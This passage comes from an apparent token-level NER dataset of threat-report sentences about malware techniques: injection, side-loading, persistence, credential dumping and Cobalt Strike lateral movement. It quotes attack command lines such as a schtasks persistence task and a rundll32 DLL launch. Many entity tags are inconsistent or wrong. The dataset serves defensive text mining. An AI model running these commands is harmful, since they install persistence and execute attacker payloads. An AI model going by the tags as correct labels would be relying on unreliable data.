"receive", "the", "task", "through", "GPO" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "usually", "compile", "all", "necessary", "libraries", "in", "a", "single", "binary,", "making", "malware", "classification", "more", "difficult", "for", "analysts", "and", "resulting", "in", "a", "large", "binary" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "victim", "opens", "the", "document," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injecting", "the", "shellcode", "into", "rundll32.exe" ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Shellcode", "which", "is", "used", "for", "code", "injection" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features" ] }, { "tokens": [ "proxy" ], "ner_tags": [ "O" ] }, { "tokens": [ "create", "scheduled", "tasks", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "create", "a", "ImmediateTask" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "API" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Windows", "APIs" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "backdoor", "is", "a", "basic", "remote", "shell" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\System32\\cmd.exe", "/c" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "forcing", "its", "component", "SmadAVprotect32.exe", "to", "side-load", "their", "malicious", "DLL." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "starts", "a", "function", "called", "bypassSMADAV" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "with", "the", "API", "function", "IsWindowVisible." ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "by", "IsWindowVisible", "function" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "calling", "the", "RegisterClass", "function", "prior", "to", "calling", "CreateWindow." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Before", "a", "call", "to", "CreateWindowEx,", "you", "would", "usually", "first", "need", "to", "create", "a", "class", "by", "calling", "RegisterClass", "and", "then", "class", "CreateWindowEx." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "malware", "creates", "2", "scheduled", "tasks" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "schtasks", "/Create", "/TN", "test", "/SC", "MINUTE", "/MO", "15", "/TR" ], "ner_tags": [ "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "creates", "a", "scheduled", "task", "to", "execute", "its", "copy", "from", "this", "randomized", "path:", "schtasks", "/Create", "/TN", "8NaZrCq3pGeDRXKF", "/SC", "MINUTE", "/MO", "15", "/TR", "\"explorer.exe", "c:\\users\\public\\8NaZrCq3pGeDRXKF.zip\\8NaZr.exe\"", "/f" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-Idus", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "The", "final", "payload", "returned", "is", "a", "lightweight", "PowerShell", "backdoor," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "It", "then", "picks", "one", "random", "C&C", "URL", "out", "of", "the", "three", "available", "and", "constructs", "a", "GET", "request" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "them", "back", "to", "the", "server", "in", "POST", "request:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "the", "validation", "of", "the", "JSON", "and", "Base64", "decoding" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "used", "by", "various", "actors", "to", "disable", "endpoint", "protection", "tools." ], "ner_tags": [ "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "techniques", "like", "process", "hollowing", "where", "the", "process", "is", "created", "in", "suspend", "mode", "and", "then", "replaced", "with", "malicious", "code." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "current", "system", "username" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "current", "username", "home", "folder" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "system’s", "network", "interfaces", "(name,", "MacAddress,", "description)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "was", "deployed", "using", "DLL", "side-loading" ], "ner_tags": [ "O", "O", "O", "B-Way", "B-HackOrg" ] }, { "tokens": [ "due", "to", "DLL", "side-loading,", "the", "loader/injector", "winutils.dll", "is", "loaded", "into", "memory", "and", "runs", "in", "the", "context" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "abused", "to", "side-load" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Packed", "Rorschach", "loader", "and", "injector" ], "ner_tags": [ "B-Way", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "the", "initial", "loader/injector", "winutils.dll", "is", "protected", "with", "UPX-style", "packing" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "unpacking,", "the", "sample", "loads" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypted", "and", "injected" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "and", "decrypts", "config" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "injected", "into", "notepad.exe,", "where", "the", "ransomware", "logic", "begins." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "injected", "into", "notepad.exe" ], "ner_tags": [ "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Disable", "the", "Windows", "firewall,", "using", "netsh.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "When", "executed", "on", "a", "Windows", "Domain", "Controller", "(DC),", "the", "ransomware", "automatically", "creates", "a", "Group", "Policy,", "spreading", "itself", "to", "other", "machines", "within", "the", "domain." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "a", "group", "policy" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "creates", "another", "group", "policy" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "creates", "another", "group", "policy" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "deletes", "them", "from", "the", "original", "location." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creating", "a", "schedule", "task" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "that", "registers", "a", "scheduled", "task", "which", "runs", "immediately", "and", "upon", "user", "logon," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "finds", "the", "relevant", "syscall", "numbers", "for", "NT", "APIs," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "with", "the", "syscall", "instruction" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "first", "creates", "a", "syscall", "table", "for", "NT", "APIs" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Creation", "of", "syscall", "table", "for", "certain", "NT", "APIs." ], "ner_tags": [ "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "It", "makes", "direct", "system", "calls", "using", "the", "“syscall”", "instruction." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Example", "use", "of", "direct", "syscall." ], "ner_tags": [ "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "It", "uses", "GetSystemDefaultUILanguage", "and", "GetUserDefaultUILanguage", "to" ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "The", "WinAPI", "CryptGenRandom", "is", "utilized" ], "ner_tags": [ "O", "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "is", "implemented", "via", "NtSetInformationFile", "using", "FileInformationClass", "FileRenameInformation," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Command", "Line", "Arguments" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "list", "of", "processes" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "code", "is", "protected", "and", "obfuscated" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "obfuscated", "process" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "reusing", "multiple", "code", "chunks", "from", "DEP-allowed", "memory", "pages,", "called", "ROP", "gadgets." ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "ROP-based", "attacks", "execute", "“RET”", "instructions", "without", "a", "prior", "“CALL”", "instruction,", "the", "running", "thread’s", "stack", "and", "the", "shadow", "stack", "values", "mismatch" ], "ner_tags": [ "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "call", "other", "vfgadgets", "that", "are", "responsible", "for", "executing", "specific", "operations,", "like", "Argument", "LoadersInvokers", "and", "Collectors." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "B-Idus", "B-HackOrg", "O", "B-Way" ] }, { "tokens": [ "Collectors", "are", "gadgets", "that", "retrieve", "a", "value", "already", "present", "in", "a", "register,", "and", "save", "it", "back", "into", "the", "attacker’s", "counterfeit", "object" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O" ] }, { "tokens": [ "leaked", "the", "stack", "pointer", "and", "retrieved", "the", "this", "pointer", "as", "a", "static", "offset", "from", "the", "stack." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "vfgadget", "address," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "prepare", "the", "address", "of", "the", "Windows", "API", "we", "want", "to", "invoke", "along", "with", "its", "arguments." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "Windows", "API", "address", "and", "its", "arguments." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "invoke", "any", "API", "we", "like," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "began", "sending", "spam", "emails,", "mailing", "new", "malicious", "attachments", "to", "continue", "spreading." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "discover", "commands", "using", "the", "Windows", "utilities", "systeminfo" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "systeminfo" ], "ner_tags": [ "O" ] }, { "tokens": [ "systeminfo" ], "ner_tags": [ "O" ] }, { "tokens": [ "ipconfig" ], "ner_tags": [ "O" ] }, { "tokens": [ "ipconfig", "/all" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "ipconfig", "/all" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Remote", "access", "tools", "were", "used", "for", "command", "and", "control,", "such", "as", "Tactical", "RMM", "and", "Anydesk." ], "ner_tags": [ "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Way" ] }, { "tokens": [ "the", "threat", "actors", "deployed", "Tactical", "RMM,", "a", "remote", "management", "agent,", "for", "additional", "access", "and", "persistence", "in", "the", "environment." ], "ner_tags": [ "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "accessed", "the", "environment", "using", "Tactical", "RMM", "to", "deploy", "Anydesk", "on", "the", "compromised", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "proceeded", "to", "deploy", "several", "remote", "management", "tools", "across", "the", "environment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tactical", "RMM", "is", "a", "remote", "management", "software", "platform", "that", "uses", "a", "combination", "of", "agents", "to", "allow", "for", "remote", "management", "and", "access", "to", "systems." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "the", "threat", "actors", "added", "AnyDesk", "to", "the", "same", "server", "running", "Tactical", "RMM,", "providing", "an", "additional", "means", "of", "access", "prior", "to", "the", "deployment", "of", "ransomware." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "by", "the", "threat", "actor", "for", "the", "remote", "management", "of", "Tactical", "RMM", "Agent." ], "ner_tags": [ "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Using", "this", "RMM", "agent", "they", "proceeded", "to", "install", "AnyDesk", "on", "the", "host." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Tactical", "RMM", "Agent", "was", "installed", "by", "the", "threat", "actor", "on", "a", "server", "to", "ensure", "remote", "access" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "intrusion", "began", "when", "a", "user", "double", "clicked", "a", "LNK", "file,", "which", "then", "executed", "encoded", "Powershell", "commands" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-HackOrg", "O" ] }, { "tokens": [ "The", "Powershell", "script,", "when", "double", "clicked", "(executed)," ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "they", "also", "used", "tasklist" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Next,", "they", "proceeded", "to", "transfer", "a", "beacon", "executable", "over", "SMB", "to", "the", "remote", "host’s", "ProgramData", "directory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors,", "however,", "proceeded", "along", "a", "more", "traditional", "path,", "using", "SMB", "file", "transfers", "and", "remote", "services", "to", "move", "laterally", "across", "domain", "controllers", "and", "several", "other", "servers" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "rasomware", "deployment", "to", "all", "hosts", "over", "SMB." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "files", "transferred", "via", "SMB", "as", "SYSTEM", "on", "remote", "hosts." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "an", "executable", "Cobalt", "Strike", "beacon", "was", "copied", "via", "SMB", "to", "a", "target", "machine" ], "ner_tags": [ "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "This", "beacon", "was", "then", "successfully", "executed", "via", "WMI" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "then", "executed", "via", "WMI." ], "ner_tags": [ "O", "O", "O", "B-Time" ] }, { "tokens": [ "wmic" ], "ner_tags": [ "O" ] }, { "tokens": [ "setup", "a", "Registry", "Run", "Key", "to", "maintain", "persistence", "on", "the", "beachhead", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "established", "persistence", "via", "a", "run", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "commands", "to", "download", "an", "Emotet", "DLL", "onto", "the", "computer." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "dropped", "Powertool64.exe", "and", "dontsleep.exe", "in", "preparation", "for", "their", "final", "actions." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "then", "dropped", "SoftPerfect’s", "Network", "Scanner" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "dropped", "and", "executed", "on", "the", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "net", "commands", "were", "run," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "proceeded", "to", "run", "the", "net", "commands" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "conducted", "further", "discovery", "tasks", "running", "find.bat", "and", "p.bat," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "and", "a", "batch", "file", "1.bat", "were", "dropped", "on", "the", "host", "and", "the", "batch", "file", "was", "executed" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "two", "batch", "files", "were", "run." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "first", "find.bat", "was", "used", "to", "run" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\System32\\cmd.exe", "/c" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "cmd.exe", "/c", "start" ], "ner_tags": [ "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "the", "threat", "actor", "executed", "a", "batch", "script" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "They", "then", "proceeded", "to", "dump", "credentials", "from", "the", "LSASS", "process", "on", "the", "host." ], "ner_tags": [ "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "‘mimikatz’", "string", "in", "the", "Netlogon", "event", "that", "is", "used", "by", "the", "Mimikatz", "Zerologon", "implementation." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O" ] }, { "tokens": [ "Process", "access", "to", "LSASS", "was", "observed,", "likely", "to", "dump", "credentials" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Granted", "Access", "level", "matches", "know", "indicators", "for", "Mimikatz" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "request", "access", "level", "of", "0x0040", "(64)", "to", "LSASS,", "as", "well", "indicating", "other", "credential", "access", "tools", "may", "have", "been", "in", "use", "by", "the", "threat", "actor." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "O" ] }, { "tokens": [ "With", "some", "further", "process", "injection" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "was", "observed", "process", "injecting", "into", "legitimate", "process" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "from", "a", "process", "that", "was", "injected", "with", "Cobalt", "Strike." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Injected", "Process", "Name" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "processes", "used", "for", "injection" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "specific", "mechanism", "used", "to", "inject", "into", "a", "foreign", "process,", "was", "injecting", "arbitrary", "code", "into", "its", "memory", "space,", "and", "executing", "it", "as", "a", "remotely", "created", "thread" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Way", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "from", "an", "injected", "process" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "A", "flight", "of", "netlogon", "authentications", "were", "observed", "from", "the", "beachhead", "host", "to", "the", "domain", "controller", "as", "a", "possible", "attempt", "at", "exploiting", "the", "domain", "controller." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "choosing", "a", "new", "server", "and", "connecting", "via", "RDP," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "From", "there,", "the", "threat", "actors", "began", "connecting", "to", "other", "hosts", "via", "RDP,", "including", "the", "a", "backup", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "did", "RDP", "to", "a", "few", "other", "servers" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "traces", "of", "RDP", "(Remote", "Desktop", "Protocol)", "connections", "were", "discovered", "on", "multiple", "compromised", "hosts", "utilized", "for", "lateral", "movement" ], "ner_tags": [ "O", "O", "B-Way", "B-Way", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "They", "started", "by", "connecting", "to", "a", "new", "server", "via", "RDP" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Once", "establishing", "the", "RDP", "connection,", "they", "deployed", "Powertool64.exe," ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "B-HackOrg", "O", "B-Way" ] }, { "tokens": [ "The", "threat", "actor", "kept", "the", "remote", "desktop", "session", "alive" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "execute", "encoded", "scripts." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "script", "will", "decode", "itself" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decoded", "base", "64", "content" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "a", "Base64", "encoded", "script", "with", "various", "components", "split", "into", "different", "variables", "for", "obfuscation", "purposes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "A", "service", "was", "also", "created", "for", "the", "agent." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "service", "was", "installed", "in", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "svcService", "Type:", "user", "mode", "serviceService", "Start", "Type:", "auto", "startService", "Account:", "LocalSystem" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "a", "separate", "service", "was", "created", "for", "that", "agent." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "service", "was", "installed", "in", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "service", "was", "installed", "in", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Service", "Type:", "user", "mode", "serviceService", "Start", "Type:", "auto", "startService", "Account:", "LocalSystem" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "was", "observed", "creating", "remote", "services" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "occurred", "from", "rundll32.exe,", "which", "was", "previously", "used", "to", "execute", "and", "run", "Cobalt", "Strike." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "C:\\Windows\\System32\\cmd.exe", "/c", "rundll32.exe", "C:\\ProgramData\\x86.dll,", "StartA" ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "delete", "its", "process", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "delete", "the", "driver", "files." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "removing", "files", "from", "the", "system." ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "was", "observed", "deleting", "files", "that", "had", "been", "dropped", "to", "disk" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "whoami", "/groups" ], "ner_tags": [ "B-Idus", "O" ] }, { "tokens": [ "The", "threat", "actor", "was", "observed", "creating", "remote", "services", "in", "order", "to", "execute", "beacon", "DLL", "files" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "began", "to", "review", "sensitive", "documents" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Both", "HTTP", "and", "HTTPS", "were", "observed", "to", "be", "used." ], "ner_tags": [ "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Infected", "email", "attachments" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "obtaining", "relevant", "device", "data,", "such", "as", "OS", "version", "and", "architecture,", "hardware", "ID,", "CPU,", "RAM,", "screen", "resolution,", "system", "language,", "etc." ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "collects", "information,", "primarily", "system", "information" ], "ner_tags": [ "I-Features", "O", "O", "I-Features", "I-Features" ] }, { "tokens": [ "can", "take", "away", "system" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "exfiltrate", "files", "and", "extract", "data", "from", "specific", "applications." ], "ner_tags": [ "B-Features", "I-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "acquire", "browsing", "histories,", "Internet", "cookies,", "usernames/passwords,", "personally", "identifiable", "details,", "credit", "card", "numbers,", "and", "other", "highly", "sensitive", "information", "from", "browsers." ], "ner_tags": [ "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "target", "stored", "browser", "data" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "collects", "sensitive", "information", "from", "the", "victim’s", "machine" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "collects", "cookie", "information,", "search", "histories,", "and", "key", "inputs", "from", "browsers" ], "ner_tags": [ "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "collect", "inside", "of", "the", "“Web", "Data”", "SQLite", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sensitive", "data", "from", "the", "victim’s", "machine." ], 